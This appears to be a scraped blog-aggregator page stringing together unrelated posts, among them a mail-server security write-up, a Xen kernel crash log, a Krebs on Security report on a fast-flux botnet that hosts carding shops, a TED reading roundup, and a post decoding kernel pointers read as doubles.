And of course, a key improvement would be to have Notmuch synchronize its state better with the mailboxes directly, instead of having the notmuch-purge hack above. Dovecot and Maildir formats support up to 26 flags, and there were discussions about using those flags to synchronize with notmuch tags so that multiple notmuch clients can see the same tags on different machines transparently.

This, however, won't make Notmuch work on my phone or webmail or any other more generic client: for that, Sieve rules are still very useful.

I still don't have webmail setup at all: so to read email, I need an actual client, which is currently my phone, which means I need to have Wifi access to read email. "Internet Cafés" or "this guy's computer" won't work as well, although I can always use ssh to login straight to the server and read mails with Mutt.

I am also considering using X509 client certificates to authenticate to the mail server without a passphrase. This involves configuring Postfix, which seems simple enough. Dovecot's configuration seems a little more involved and less well documented. It seems that both [OfflimeIMAP][] and K-9 mail support client-side certs. OfflineIMAP prompts me for the password so it doesn't get leaked anywhere. I am a little concerned about building yet another CA, but I guess it would not be so hard...

The server side of things needs more documenting, particularly the spam filters. This is currently spread around this wiki, mostly in configuration.

Security considerations

The whole purpose of this was to make it easier to read my mail on other devices. This introduces a new vulnerability: someone may steal that device or compromise it to read my mail, impersonate me on different services and even get a shell on the remote server.

Thanks to the two-factor authentication I setup on the server, I feel a little more confident that just getting the passphrase to the mail account isn't sufficient anymore in leveraging shell access. It also allows me to login with ssh on the server without trusting the machine too much, although that only goes so far... Of course, sudo is then out of the question and I must assume that everything I see is also seen by the attacker, which can also inject keystrokes and do all sorts of nasty things.

Since I also connected my email account on my phone, someone could steal the phone and start impersonating me. The mitigation here is that there is a PIN for the screen lock, and the phone is encrypted. Encryption isn't so great when the passphrase is a PIN, but I'm working on having a better key that is required on reboot, and the phone shuts down after 5 failed attempts. This is documented in my phone setup.

Client-side X509 certificates further mitigates those kind of compromises, as the X509 certificate won't give shell access.

Basically, if the phone is lost, all hell breaks loose: I need to change the email password (or revoke the certificate), as I assume the account is about to be compromised. I do not trust Android security to give me protection indefinitely. In fact, one could argue that the phone is already compromised and putting the password there already enabled a possible state-sponsored attacker to hijack my email address. This is why I have an OpenPGP key on my laptop to authenticate myself for critical operations like code signatures.

The risk of identity theft from the state is, after all, a tautology: the state is the primary owner of identities, some could say by definition. So if a state-sponsored attacker would like to masquerade as me, they could simply issue a passport under my name and join a OpenPGP key signing party, and we'd have other problems to deal with, namely, proper infiltration counter-measures and counter-snitching.

Planet DebianIngo Juergensmann: Xen randomly crashing server - part 2

Some weeks ago I blogged about "Xen randomly crashing server". The problem back then was that I couldn't get any information why the server reboots. Using a netconsole was not possible, because netconsole refused to work with the bridge that is used for Xen networking. Luckily my colocation partner rrbone.net connected the second network port of my server to the network so that I could use eth1 instead of the bridged eth0 for netconsole.

Today the server crashed several times and I was able to collect some more information than just the screenshots from IPMI/KVM console as shown in my last blog entry (full netconsole output is attached as a file): 

May 12 11:56:39 31.172.31.251 [829681.040596] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 3.16.0-4-amd64 #1 Debian 3.16.7-ckt25-2
May 12 11:56:39 31.172.31.251 [829681.040647] Hardware name: Supermicro X9SRE/X9SRE-3F/X9SRi/X9SRi-3F/X9SRE/X9SRE-3F/X9SRi/X9SRi-3F, BIOS 3.0a 01/03/2014
May 12 11:56:39 31.172.31.251 [829681.040701] task: ffffffff8181a460 ti: ffffffff81800000 task.ti: ffffffff81800000
May 12 11:56:39 31.172.31.251 [829681.040749] RIP: e030:[<ffffffff812b7e56>]
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.040802] RSP: e02b:ffff880280e03a58  EFLAGS: 00010286
May 12 11:56:39 31.172.31.251 [829681.040834] RAX: ffff88026eec9070 RBX: ffff88023c8f6b00 RCX: 00000000000000ee
May 12 11:56:39 31.172.31.251 [829681.040880] RDX: 00000000000004a0 RSI: ffff88006cd1f000 RDI: ffff88026eec9422
May 12 11:56:39 31.172.31.251 [829681.040927] RBP: ffff880280e03b38 R08: 00000000000006c0 R09: ffff88026eec9062
May 12 11:56:39 31.172.31.251 [829681.040973] R10: 0100000000000000 R11: 00000000af9a2116 R12: ffff88023f440d00
May 12 11:56:39 31.172.31.251 [829681.041020] R13: ffff88006cd1ec66 R14: ffff88025dcf1cc0 R15: 00000000000004a8
May 12 11:56:39 31.172.31.251 [829681.041075] FS:  0000000000000000(0000) GS:ffff880280e00000(0000) knlGS:ffff880280e00000
May 12 11:56:39 31.172.31.251 [829681.041124] CS:  e033 DS: 0000 ES: 0000 CR0: 0000000080050033
May 12 11:56:39 31.172.31.251 [829681.041153] CR2: ffff88006cd1f000 CR3: 0000000271ae8000 CR4: 0000000000042660
May 12 11:56:39 31.172.31.251 [829681.041202] Stack:
May 12 11:56:39 31.172.31.251 [829681.041225]  ffffffff814d38ff
May 12 11:56:39 31.172.31.251  ffff88025b5fa400
May 12 11:56:39 31.172.31.251  ffff880280e03aa8
May 12 11:56:39 31.172.31.251  9401294600a7012a
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041287]  0100000000000000
May 12 11:56:39 31.172.31.251  ffffffff814a000a
May 12 11:56:39 31.172.31.251  000000008181a460
May 12 11:56:39 31.172.31.251  00000000000080fe
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041346]  1ad902feff7ac40e
May 12 11:56:39 31.172.31.251  ffff88006c5fd980
May 12 11:56:39 31.172.31.251  ffff224afc3e1600
May 12 11:56:39 31.172.31.251  ffff88023f440d00
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041407] Call Trace:
May 12 11:56:39 31.172.31.251 [829681.041435]  <IRQ>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041441]
May 12 11:56:39 31.172.31.251  [<ffffffff814d38ff>] ? ndisc_send_redirect+0x3bf/0x410
May 12 11:56:39 31.172.31.251 [829681.041506]  [<ffffffff814a000a>] ? ipmr_device_event+0x7a/0xd0
May 12 11:56:39 31.172.31.251 [829681.041548]  [<ffffffff814bc74c>] ? ip6_forward+0x71c/0x850
May 12 11:56:39 31.172.31.251 [829681.041585]  [<ffffffff814c9e54>] ? ip6_route_input+0xa4/0xd0
May 12 11:56:39 31.172.31.251 [829681.041621]  [<ffffffff8141f1a3>] ? __netif_receive_skb_core+0x543/0x750
May 12 11:56:39 31.172.31.251 [829681.041729]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.041771]  [<ffffffffa0585eb2>] ? br_handle_frame_finish+0x1c2/0x3c0 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041821]  [<ffffffffa058c757>] ? br_nf_pre_routing_finish_ipv6+0xc7/0x160 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041872]  [<ffffffffa058d0e2>] ? br_nf_pre_routing+0x562/0x630 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041907]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041955]  [<ffffffff8144fb65>] ? nf_iterate+0x65/0xa0
May 12 11:56:39 31.172.31.251 [829681.041987]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042035]  [<ffffffff8144fc16>] ? nf_hook_slow+0x76/0x130
May 12 11:56:39 31.172.31.251 [829681.042067]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042116]  [<ffffffffa0586220>] ? br_handle_frame+0x170/0x240 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042148]  [<ffffffff8141ee24>] ? __netif_receive_skb_core+0x1c4/0x750
May 12 11:56:39 31.172.31.251 [829681.042185]  [<ffffffff81009f9c>] ? xen_clocksource_get_cycles+0x1c/0x20
May 12 11:56:39 31.172.31.251 [829681.042217]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.042251]  [<ffffffffa063f50f>] ? xenvif_tx_action+0x49f/0x920 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042299]  [<ffffffffa06422f8>] ? xenvif_poll+0x28/0x70 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042331]  [<ffffffff8141f7b0>] ? net_rx_action+0x140/0x240
May 12 11:56:39 31.172.31.251 [829681.042367]  [<ffffffff8106c6a1>] ? __do_softirq+0xf1/0x290
May 12 11:56:39 31.172.31.251 [829681.042397]  [<ffffffff8106ca75>] ? irq_exit+0x95/0xa0
May 12 11:56:39 31.172.31.251 [829681.042432]  [<ffffffff8135a285>] ? xen_evtchn_do_upcall+0x35/0x50
May 12 11:56:39 31.172.31.251 [829681.042469]  [<ffffffff8151669e>] ? xen_do_hypervisor_callback+0x1e/0x30
May 12 11:56:39 31.172.31.251 [829681.042499]  <EOI>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.042506]
May 12 11:56:39 31.172.31.251  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042561]  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042592]  [<ffffffff81009e7c>] ? xen_safe_halt+0xc/0x20
May 12 11:56:39 31.172.31.251 [829681.042627]  [<ffffffff8101c8c9>] ? default_idle+0x19/0xb0
May 12 11:56:39 31.172.31.251 [829681.042666]  [<ffffffff810a83e0>] ? cpu_startup_entry+0x340/0x400
May 12 11:56:39 31.172.31.251 [829681.042705]  [<ffffffff81903076>] ? start_kernel+0x497/0x4a2
May 12 11:56:39 31.172.31.251 [829681.042735]  [<ffffffff81902a04>] ? set_init_arg+0x4e/0x4e
May 12 11:56:39 31.172.31.251 [829681.042767]  [<ffffffff81904f69>] ? xen_start_kernel+0x569/0x573
May 12 11:56:39 31.172.31.251 [829681.042797] Code:
May 12 11:56:39 31.172.31.251  <f3>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.043113] RIP
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.043145]  RSP <ffff880280e03a58>
May 12 11:56:39 31.172.31.251 [829681.043170] CR2: ffff88006cd1f000
May 12 11:56:39 31.172.31.251 [829681.043488] ---[ end trace 1838cb62fe32daad ]---
May 12 11:56:39 31.172.31.251 [829681.048905] Kernel panic - not syncing: Fatal exception in interrupt
May 12 11:56:39 31.172.31.251 [829681.048978] Kernel Offset: 0x0 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffff9fffffff)

I'm not that good at reading this kind of output, but to me it seems that ndisc_send_redirect is at fault. When googling for "ndisc_send_redirect" you can find a patch on lkml.org and Debian bug #804079, both seem to be related to IPv6.

When looking at the linux kernel source mentioned in the lkml patch I see that this patch is already applied (line 1510): 

        if (ha) 
                ndisc_fill_addr_option(buff, ND_OPT_TARGET_LL_ADDR, ha);

So, when the patch was intended to prevent "leading to data corruption or in the worst case a panic when the skb_put failed" it does not help in my case or in the case of #804079.

Any tips are appreciated!

PS: I'll contribute to that bug in the BTS, of course!

AttachmentSize
syslog-xen-crash.txt24.27 KB
Kategorie: 
 

Krebs on SecurityCarding Sites Turn to the ‘Dark Cloud’

Crooks who peddle stolen credit cards on the Internet face a constant challenge: Keeping their shops online and reachable in the face of meddling from law enforcement officials, security firms, researchers and vigilantes. In this post, we’ll examine a large collection of hacked computers around the world that currently serves as a criminal cloud hosting environment for a variety of cybercrime operations, from sending spam to hosting malicious software and stolen credit card shops.

I first became aware of this botnet, which I’ve been referring to as the “Dark Cloud” for want of a better term, after hearing from Noah Dunker, director of security labs at  Kansas City-based vendor RiskAnalytics. Dunker reached out after watching a Youtube video I posted that featured some existing and historic credit card fraud sites. He asked what I knew about one of the carding sites in the video: A fraud shop called “Uncle Sam,” whose home page pictures a pointing Uncle Sam saying “I want YOU to swipe.”

The "Uncle Sam" carding shop is one of a half-dozen that reside on a Dark Cloud criminal hosting environment.

The “Uncle Sam” carding shop is one of a half-dozen that reside on a Dark Cloud criminal hosting environment.

I confessed that I knew little of this shop other than its existence, and asked why he was so interested in this particular crime store. Dunker showed me how the Uncle Sam card shop and at least four others were hosted by the same Dark Cloud, and how the system changed the Internet address of each Web site roughly every three minutes. The entire robot network, or”botnet,” consisted of thousands of hacked home computers spread across virtually every time zone in the world, he said. 

Dunker urged me not to take his word for it, but to check for myself the domain name server (DNS) settings of the Uncle Sam shop every few minutes. DNS acts as a kind of Internet white pages, by translating Web site names to numeric addresses that are easier for computers to navigate. The way this so-called “fast-flux” botnet works is that it automatically updates the DNS records of each site hosted in the Dark Cloud every few minutes, randomly shuffling the Internet address of every site on the network from one compromised machine to another in a bid to frustrate those who might try to take the sites offline.

Sure enough, a simple script was all it took to find a few dozen Internet addresses assigned to the Uncle Sam shop over just 20 minutes of running the script. When I let the DNS lookup script run overnight, it came back with more than 1,000 unique addresses to which the site had been moved during the 12 or so hours I let it run. According to Dunker, the vast majority of those Internet addresses (> 80 percent) tie back to home Internet connections in Ukraine, with the rest in Russia and Romania.

'Mr. Bin,' another carding shop hosting on the dark cloud service. A 'bin' is the "bank identification number" or the first six digits on a card, and it's mainly how fraudsters search for stolen cards.

‘Mr. Bin,’ another carding shop hosting on the dark cloud service. A ‘bin’ is the “bank identification number” or the first six digits on a card, and it’s mainly how fraudsters search for stolen cards.

“Right now there’s probably over 2,000 infected endpoints that are mostly broadband subscribers in Eastern Europe,” enslaved as part of this botnet, Dunker said. “It’s a highly functional network, and it feels kind of like a black market version of Amazon Web Services. Some of the systems appear to be used for sending spam and some are for big dynamic scaled content delivery.”

Dunker said that historic DNS records indicate that this botnet has been in operation for at least the past year, but that there are signs it was up and running as early as Summer 2014.

Wayne Crowder, director of threat intelligence for RiskAnalytics, said the botnet appears to be a network structure set up to push different crimeware, including ransomware, click fraud tools, banking Trojans and spam.

Crowder said the Windows-based malware that powers the botnet assigns infected hosts different roles, depending on the victim machine’s strengths or weaknesses: More powerful systems might be used as DNS servers, while infected systems behind home routers may be infected with a “reverse proxy,” which lets the attackers control the system remotely.

“Once it’s infected, it phones home and gets a role assigned to it,” Crowder said. “That may be to continue sending spam, host a reverse proxy, or run a DNS server. It kind of depends on what capabilities it has.”

"Popeye," another carding site hosted on the criminal cloud network.

“Popeye,” another carding site hosted on the criminal cloud network.

Indeed, this network does feel rather spammy. In my book Spam Nation, I detailed how the largest spam affiliate program on the planet at the time used a similar fast-flux network of compromised systems to host its network of pill sites that were being promoted in the junk email. Many of the domains used in those spam campaigns were two- and three-word domains that appeared to be randomly created for use in malware and spam distribution.

“We’re seeing two English words separated by a dash,” Dunker said the hundreds of hostnames found on the dark cloud network that do not appear to be used for carding shops. “It’s a very spammy naming convention.”

It’s unclear whether this botnet is being used by more than one individual or group. The variety of crimeware campaigns that RiskAnalytics has tracked operated through the network suggests that it may be rented out to multiple different cybercrooks. Still, other clues suggests the whole thing may have been orchestrated by the same gang.

For example, nearly all of the carding sites hosted on the dark cloud network — including Uncle Sam, Scrooge McDuck, Mr. Bin, Try2Swipe, Popeye, and Royaldumps — share the same or very similar site designs. All of them say that customers can look up available cards for sale at the site, but that purchasing the cards requires first contacting the proprietor of the shops directly via instant message.

All six of these shops — and only these six — are advertised prominently on the cybercrime forum prvtzone[dot]su. It is unclear whether this forum is run or frequented by the people who run this botnet, but the forum does heavily steer members interested in carding toward these six carding services. It’s unclear why, but Prvtzone has a Google Analytics tracking ID (UA-65055767) embedded in the HTML source of its page that may hold clues about the proprietors of this crime forum.

The "dumps" section of the cybercrime forum Prvtzone advertises all six of the carding domains found on the fast-flux network.

The “dumps” section of the cybercrime forum Prvtzone advertises all six of the carding domains found on the fast-flux network.

Dunker says he’s convinced it’s one group that occasionally rents out the infrastructure to other criminals.

“At this point, I’m positive that there’s one overarching organized crime operation driving this whole thing,” Dunker said. “But they do appear to be leasing parts of it out to others.”

Dunker and Crowder say they hope to release an initial report on their findings about the botnet sometime next week, but that for now the rabbit hole appears to go quite deep with this crime machine. For instance, there  are several sites hosted on the network that appear to be clones of real businesses selling expensive farm equipment in Europe, and multiple sites report that these are fake companies looking to scam the unwary.

“There are a lot of questions that this research poses that we’d like to be able to answer,” Crowder said.

For now, I’d invite anyone interested to feel free to contribute to the research. This text file contains a historic record of domains I found that are or were at one time tied to the 40 or so Internet addresses I found in my initial, brief DNS scans of this network. Here’s a larger list of some 1,024 addresses that came up when I ran the scan for about 12 hours.

If you liked this story, check out this piece about another carding forum called Joker’s Stash, which also uses a unique communications system to keep itself online and reachable to all comers.

TEDLife on the Chinese-North Korean border, putting the joy back in voting, and an encouragement to give up

Suki_Kim_CTA

North Korean borderlands. Hotel rooms outfitted with binoculars to peer across the river at the forbidden land, spotty phone connections and a bridge partially destroyed by Korean War-era bombs, and smugglers of diamonds, watches and expensive face creams: This is the Chinese-North Korean border, a world of shifting identities and coded language. In the New Republic, Suki Kim traces its shadowy outlines as she makes her way to Dadong, a notoriously dangerous border city. In Dadong, she spends time with a group of smugglers, attempting to pierce the impenetrable logic of their world as she seeks a deeper understanding of North Korea that has always eluded her, “Whatever I sought to understand about North Korea was always beyond my grasp; the country’s inherent unknowability was a condition of its survival.” (Watch Suki’s TED Talk)

How your brain controls what you weigh. Losing weight is hard, and only a slim fraction of dieters are able to do so successfully. In the New York Times, Sandra Aamodt reveals the inherent flaw in dieting: the brain. The brain, she writes, has a host of tools that it uses to keep you within a certain weight range called your set point.  The brain’s natural responses not only make it difficult to lose weight and maintain it, but also make it more likely that you’ll end up gaining weight in the long run. But don’t give up! Sandra offers suggestions on what to do instead–within the limit of your brain’s natural responses, of course. (Watch Sandra’s TED Talk)

The second digital revolution. While the Internet has inarguably been revolutionary, it still faces significant challenges, like reliably verifying identity and conducting transactions online. But blockchain–the technology that powers bitcoin–promises to change all that, argue Don Tapscott and son Alex Tapscott in their new book Blockchain Revolution. The blockchain establishes what they call a “Trust Protocol” and the ability to record “virtually everything of value and importance to humankind,” without having to worry about security. It is, they suggest, the second generation of the digital revolution. (Watch Don’s TED Talk)

Don’t drag yourself to the polls, celebrate! US election seasons used to have parades, festivals and open-air debates — a joyful participation in civic life. Now, they’re mostly soundbites from a TV screen or 140-character inflammations. But it doesn’t have to be this way, says Eric Liu. With help from the Knight Foundation, Civic University, Liu’s nonprofit for powerful citizenship, is launching the Joy of Voting project. In four pilot cities across the country, it will partner with local organizations to get the community excited about voting this November. As Liu writes: “From parades and street theater, to civic engagement apps and university rivalries, this project will combine the old and the new to reinvigorate a culture of voting.” (Watch Eric’s TED Talk)

A hurdle to becoming who you are. Equality needs more than just social acceptance; it needs legal protections. In The Guardian, model and activist Geena Rocero writes that even though she and many other members of the transgender community were socially accepted in the Philippines, not being able to change her name and gender marker on important legal documents was a substantial hindrance — one that motivated her move to America. After moving to San Francisco and later to New York City to pursue a modeling career, she grappled with whether or not to reveal her transgender identity professionally. But after she came out ( at TED2014), she was inspired to tell the stories of others going through similar struggles. “There are still a lot of trans people’s stories that need to be told – the ones who never had the resources and support to emigrate to the United States.” (Watch her TED Talk)

The ultimate check and balance. In his first-ever longform article, Edward Snowden asserts the political and democratic necessity of whistleblowing  in The Intercept. Sitting with the knowledge of enormous, illegal wrongdoing, he says, is an excruciating moral compromise too many are forced to make. Citing heroic examples, such as the Pentagon Papers and Wikileaks, Snowden explains the uncomfortable differences between accepted and illegal whistleblowing. “What explains the distinction between the permissible and the impermissible disclosure? The answer is control. A leak is acceptable if it’s not seen as a threat, a challenge to the prerogatives of the institution.” Despite the enormous risks, he argues, whistleblowers like him act on this core driving principle: “We, the people, are ultimately the strongest and most reliable check on the power of government.” (Watch his TED Talk)

Give up more often. “Never give up” is a cornerstone of persistence and grit. But according to Tim Harford in The Financial Times, knowing when to give up is just as valuable. Using Daniel Kahneman’s (watch his TED Talk) and Amos Tversky’s “loss aversion” principle, Harford shows how our natural psychological dislike of losses over gains causes us to overlook the advantages of moving on and, ultimately, trying a better approach to the same problem. (Watch Tim’s TED Talk)

The unintended consequences of campus reform. At the end of 2015, students protesters across the United States approached campus administrators with demands for campus reform addressing racial concerns on campus. In the Wall Street Journal, using key tenets of psychology and scientific studies, Jonathan Haidt and Lee Jussim show how the proposed reforms may actually backfire, arguing that “they are likely to damage race relations and to make campus life more uncomfortable for everyone, particularly black students.” Instead, they call on universities to try a different approach than the one that has failed over the past several decades, a new approach based on available knowledge of what does and doesn’t work in order to create a campus where everyone feels welcome. (Watch Jonathan’s TED Talk)


Sociological ImagesDatabase Enables Users to Choose Films Based on Gender Balance

Polygraph‘s Hanah Anderson and Matt Daniels undertook a massive analysis of the dialogue of approximately 2,000 films, counting those characters who spoke at least 100 words. With the data, they’ve producing a series of visuals that powerfully illustrate male dominance in the American film industry.

We’ve seen data like this before and it tells the same disturbing story: across the industry, whatever the sub-genre, men and their voices take center stage.

7
They have some other nice insights, too, like the silencing of women as they get older and the enhancing of men’s older voices.

But knowledge is power. My favorite thing about this project is that it enables any of us — absolutely anyone — to look up the gender imbalance in dialogue in any of those 2,000 movies. This means that you can know ahead of time how well women’s and men’s voices are represented and decide whether to watch. The dialogue in Adaptation, for example, is 70% male; Good Will Hunting, 85% male; The Revenant, 100% male.

We could even let the site choose the movies for us. Anderson and Daniels include a convenient dot graph that spans the breadth of inclusion, with each dot representing a movie. You can just click on the distribution that appeals to you and choose a movie from there. Clueless, Gosford Park, and The Wizard of Oz all come in at a perfect 50/50 split. Or, you can select a decade, genre, and gender balance and get suggestions.

Polygraph has enabled us to put our money where our principles are. If enough of us decide that we won’t buy any movie that tilts too far male, it would put pressure on filmmakers to make movies that better reflected real life. This data makes it possible to do just that.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on TwitterFacebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianMatthew Garrett: Convenience, security and freedom - can we pick all three?

Moxie, the lead developer of the Signal secure communication application, recently blogged on the tradeoffs between providing a supportable federated service and providing a compelling application that gains significant adoption. There's a set of perfectly reasonable arguments around that that I don't want to rehash - regardless of feelings on the benefits of federation in general, there's certainly an increase in engineering cost in providing a stable intra-server protocol that still allows for addition of new features, and the person leading a project gets to make the decision about whether that's a valid tradeoff.

One voiced complaint about Signal on Android is the fact that it depends on the Google Play Services. These are a collection of proprietary functions for integrating with Google-provided services, and Signal depends on them to provide a good out of band notification protocol to allow Signal to be notified when new messages arrive, even if the phone is otherwise in a power saving state. At the time this decision was made, there were no terribly good alternatives for Android. Even now, nobody's really demonstrated a free implementation that supports several million clients and has no negative impact on battery life, so if your aim is to write a secure messaging client that will be adopted by as many people is possible, keeping this dependency is entirely rational.

On the other hand, there are users for whom the decision not to install a Google root of trust on their phone is also entirely rational. I have no especially good reason to believe that Google will ever want to do something inappropriate with my phone or data, but it's certainly possible that they'll be compelled to do so against their will. The set of people who will ever actually face this problem is probably small, but it's probably also the set of people who benefit most from Signal in the first place.

(Even ignoring the dependency on Play Services, people may not find the official client sufficient - it's very difficult to write a single piece of software that satisfies all users, whether that be down to accessibility requirements, OS support or whatever. Slack may be great, but there's still people who choose to use Hipchat)

This shouldn't be a problem. Signal is free software and anybody is free to modify it in any way they want to fit their needs, and as long as they don't break the protocol code in the process it'll carry on working with the existing Signal servers and allow communication with people who run the official client. Unfortunately, Moxie has indicated that he is not happy with forked versions of Signal using the official servers. Since Signal doesn't support federation, that means that users of forked versions will be unable to communicate with users of the official client.

This is awkward. Signal is deservedly popular. It provides strong security without being significantly more complicated than a traditional SMS client. In my social circle there's massively more users of Signal than any other security app. If I transition to a fork of Signal, I'm no longer able to securely communicate with them unless they also install the fork. If the aim is to make secure communication ubiquitous, that's kind of a problem.

Right now the choices I have for communicating with people I know are either convenient and secure but require non-free code (Signal), convenient and free but insecure (SMS) or secure and free but horribly inconvenient (gpg). Is there really no way for us to work as a community to develop something that's all three?

comment count unavailable comments

Google AdsenseBlock wisely with Impression charts in the Ad review center

Today we’ve launched impression charts in the Ad review center. Impression charts provide you with insights into the frequency at which individual ad creatives are shown on your site.



Based on feedback from our publishers, we’ve replaced the previous interface with an impression chart that shows the absolute number of impressions and its distribution over time. When you’re considering blocking an ad, the impression chart can help you make a more informed decision by highlighting the potential revenue impact it may have. 

To learn more, please visit our Help Center.

We'd love to hear your feedback in the comments section below and on G+ and Twitter.
 


Posted by Liyuan Lu
Software Engineer

Planet Linux Australiasthbrx - a POWER technical blog: Doubles in hex and why Kernel addresses ~= -2

It started off a regular Wednesday morning when I hear from my desk a colleague muttering about doubles and their hex representation. "But that doesn't look right", "How do I read this as a float", and "redacted you're the engineer, you do it". My interest piqued, I headed over to his desk to enquire about the great un-solvable mystery of the double and its hex representation. The number which would consume me for the rest of the morning: 0xc00000001568fba0.

That's a Perfectly Valid hex Number!

I hear you say. And you're right, if we were to treat this as a long it would simply be 13835058055641365408 (or -4611686018068186208 if we assume a signed value). But we happen to know that this particular piece of data which we have printed is supposed to represent a double (-2 to be precise). "Well print it as a double" I hear from the back, and once again we should all know that this can be achieved rather easily by using the %f/%e/%g specifiers in our print statement. The only problem is that in kernel land (where we use printk) we are limited to printing fixed point numbers, hence why our only easy option was to print our double in it's raw hex format.

This is the point where we all think back to that university course where number representations were covered in depth, and terms like 'mantissa' and 'exponent' surface in our minds. Of course as we rack our brains we realise there's no way that we're going to remember exactly how a double is represented and bring up the IEEE 754 Wikipedia page.

What is a Double?

Taking a step back for a second, a double (or a double-precision floating-point) is a number format used to represent floating-point numbers (those with a decimal component). They are made up of a sign bit, an exponent and a fraction (or mantissa):

Double Format

Where the number they represent is defined by:

Double Formula

So this means that a 1 in the MSB (sign bit) represents a negative number, and we have some decimal component (the fraction) which we multiply by some power of 2 (as determined by the exponent) to get our value.

Alright, so what's 0xc00000001568fba0?

The reason we're all here to be begin with, so what's 0xc00000001568fba0 if we treat it as a double? We can first split it into the three components:

0xc00000001568fba0:

Sign bit: 1 -> Negative
Exponent: 0x400 -> 2(1024 - 1023)
Fraction: 0x1568fba0 -> 1.something

And then use the formula above to get our number:

(-1)1 x 1.something x 2(1024 - 1023)

But there's a much easier way! Just write ourselves a little program in userspace (where we are capable of printing floats) and we can save ourselves most of the trouble.

#include <stdio.h>

void main(void)
{
    long val = 0xc00000001568fba0;

    printf("val: %lf\n", *((double *) &val));
}

So all we're doing is taking our hex value and storing it in a long (val), then getting a pointer to val, casting it to a double pointer, and dereferencing it and printing it as a float. Drum Roll And the answer is?

"val: -2.000000"

"Wait a minute, that doesn't quite sound right". You're right, it does seem a bit strange that this is exactly -2. Well it may be that we are not printing enough decimal places to see the full result, so update our print statement to:

printf("val: %.64lf\n", *((double *) &val));

And now we get:

"val: -2.0000001595175973534423974342644214630126953125000000"

Much better... But still where did this number come from and why wasn't it the -2 that we were expecting?

Kernel Pointers

At this point suspicions had been raised that what was being printed by my colleague was not what he expected and that this was in fact a Kernel pointer. How do you know? Lets take a step back for a second...

In the PowerPC architecture, the address space which can be seen by an application is known as the effective address space. We can take this and translate it into a virtual address which when mapped through the HPT (hash page table) gives us a real address (or the hardware memory address).

The effective address space is divided into 5 regions:

Effective Address Table

As you may notice, Kernel addresses begin with 0xc. This has the advantage that we can map a virtual address without the need for a table by simply masking the top nibble.

Thus it would be reasonable to assume that our value (0xc00000001568fba0) was indeed a pointer to a Kernel address (and further code investigation confirmed this).

But What is -2 as a Double in hex?

Well lets modify the above program and find out:

include <stdio.h>

void main(void)
{
        double val = -2;

        printf("val: 0x%lx\n", *((long *) &val));
}

Result?

"val: 0xc000000000000000"

Now that sounds much better. Lets take a closer look:

0xc000000000000000:

Sign Bit: 1 -> Negative
Exponent: 0x400 -> 2(1024 - 1023)
Fraction: 0x0 -> Zero

So if you remember from above, we have:

(-1)1 x 1.0 x 2(1024 - 1023) = -2

What about -1? -3?

-1:

0xbff0000000000000:

Sign Bit: 1 -> Negative
Exponent: 0x3ff -> 2(1023 - 1023)
Fraction: 0x0 -> Zero

(-1)1 x 1.0 x 2(1023 - 1023) = -1

-3:

0xc008000000000000:

Sign Bit: 1 -> Negative
Exponent: 0x400 -> 2(1024 - 1023)
Fraction: 0x8000000000000 -> 0.5

(-1)1 x 1.5 x 2(1024 - 1023) = -3

So What Have We Learnt?

Firstly, make sure that what you're printing is what you think you're printing.

Secondly, if it looks like a Kernel pointer then you're probably not printing what you think you're printing.

Thirdly, all Kernel pointers ~= -2 if you treat them as a double.

And Finally, with my morning gone, I can say for certain that if we treat it as a double, 0xc00000001568fba0 = -2.0000001595175973534423974342644214630126953125.

CryptogramHacking Gesture-Based Security

Interesting research: Abdul Serwadda, Vir V. Phoha, Zibo Wang, Rajesh Kumar, and Diksha Shukla, "Robotic Robbery on the Touch Screen," ACM Transactions on Information and System Security, May 2016.

Abstract: Despite the tremendous amount of research fronting the use of touch gestures as a mechanism of continuous authentication on smart phones, very little research has been conducted to evaluate how these systems could behave if attacked by sophisticated adversaries. In this article, we present two Lego-driven robotic attacks on touch-based authentication: a population statistics-driven attack and a user-tailored attack. The population statistics-driven attack is based on patterns gleaned from a large population of users, whereas the user-tailored attack is launched based on samples stolen from the victim. Both attacks are launched by a Lego robot that is trained on how to swipe on the touch screen. Using seven verification algorithms and a large dataset of users, we show that the attacks cause the system's mean false acceptance rate (FAR) to increase by up to fivefold relative to the mean FAR seen under the standard zero-effort impostor attack. The article demonstrates the threat that robots pose to touch-based authentication and provides compelling evidence as to why the zero-effort attack should cease to be used as the benchmark for touch-based authentication systems.

News article. Slashdot thread.

Worse Than FailureCodeSOD: The Difficulties of Choice

It’s no easy task combing through the submissions and choosing the right code sample.

